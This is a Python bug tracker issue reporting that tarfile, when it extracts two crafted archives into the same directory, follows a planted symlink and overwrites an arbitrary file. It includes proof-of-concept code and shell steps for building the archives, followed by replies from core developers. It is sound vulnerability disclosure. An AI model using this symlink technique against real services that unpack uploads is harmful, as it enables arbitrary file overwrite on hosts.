classification
Title: "tarfile" library will lead to "write any content to any file on the host".
Type: security Stage:
Components: Library (Lib) Versions: Python 3.7
process
Status: open Resolution:
Dependencies: Superseder:
Assigned To: Nosy List: eric.araujo, gregory.p.smith, leveryd
Priority: normal Keywords:

Created on 2021-05-03 17:44 by leveryd, last changed 2021-05-08 03:14 by gregory.p.smith.

Files
File name Uploaded Description Edit
poc.tar.gz leveryd, 2021-05-03 17:44
Messages (3)
msg392827 - (view) Author: guangli dong (leveryd) Date: 2021-05-03 17:44
if uncompress file twice to the same dir, attacker can "write any content to any file on the host"".

poc code like below:
```
import tarfile


dir_name = "/tmp/anything"
file1_name = "/tmp/a.tar.gz"  # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz"  # echo "it is just poc" > /tmp/payload; rm -rf test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a


def vuln_tar(tar_path):
	"""
	:param tar_path:
	:return:
	"""
	import tarfile
	tar = tarfile.open(tar_path, "r:tar")
	file_names = tar.getnames()
	for file_name in file_names:
	    tar.extract(file_name, dir_name)
	tar.close()


vuln_tar(file1_name)
vuln_tar(file2_name)
```

in this poc code, if one service uncompress tar file which is uploaded by attacker to "dir_name" twice, attacker can create "/tmp/a" and write "it is just poc" string into "/tmp/a" file.
msg393219 - (view) Author: Éric Araujo (eric.araujo) * (Python committer) Date: 2021-05-07 20:28
Can you contact the security team (info at https://www.python.org/dev/security/ ) directly?

In general, tarfile (and other Python file functions!) can create files anywhere on the filesystem, provided that the process user has the right permissions.  But it seems that you’re talking about an unexpected behaviour leading to unwanted operations, so please send more details about the problem to the team.  Thank you for your report!
msg393234 - (view) Author: Gregory P. Smith (gregory.p.smith) * (Python committer) Date: 2021-05-08 03:14
TL;DR - A tar file being extracted doesn't check to see if it is overwriting an existing file, which could be a symlink to elsewhere leading to elsewhere's contents being clobbered assuming the elsewhere file exists.

doing an unlink before opening the destination file (ignoring either success or FileNotFound) during extract would avoid this _specific_ case.

But tarfile is already documented with a warning about untrusted inputs being able to do bad things:

https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

fixing this one serialized case doesn't do anything about other cases or race conditions we won't claim protection against, so I'm not sure this issue is serious from a stdlib perspective.
History
Date User Action Args
2021-05-08 03:14:09gregory.p.smithsetnosy: + gregory.p.smith
messages: + msg393234
2021-05-07 20:28:21eric.araujosetnosy: + eric.araujo
messages: + msg393219
2021-05-03 17:44:03leverydcreate